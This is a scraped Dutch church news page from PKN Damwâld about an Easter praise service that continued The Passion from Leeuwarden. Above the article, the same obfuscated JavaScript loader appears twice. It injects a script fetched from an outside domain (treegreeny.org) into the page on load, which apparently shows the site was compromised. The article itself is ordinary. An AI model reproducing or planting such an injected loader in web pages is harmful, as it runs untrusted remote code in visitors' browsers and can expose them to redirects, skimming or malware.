;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); The Passion ging verder in de ontmoeting - PKN Damwâld

The Passion ging verder in de ontmoeting

Gepubliceerd op: maandag 17 april 2017

Tijdens de Peaske Praise ging de Passion uit Leeuwarden verder in de Ontmoeting. Drie dragen na de Passion is Jezus opgestaan! Hij leeft en wij mogen weten dan Hij sterker is dan de dood. Door middel van mooie Samenzang, luister liederen en film werd het paasfeest gevierd. Johan maakte door middel van zijn praatje duidelijk dat Jezus leeft in deze wereld. Ondanks alle problematiek mogen wij weten en ervaren dat Jezus doorleeft en elke dag ons helpt!

De dienst werd druk bezorgt van mensen uit alle uithoeken van Friesland! Wij bedanken Johan voor zijn geweldige praatje en de Lifenote voor het muzikale feest! Tijdens de dienst zijn een aantal mooie foto’s gemaakt (Bedankt Bart Jan) die u in het fotoalbum terug kunt vinden.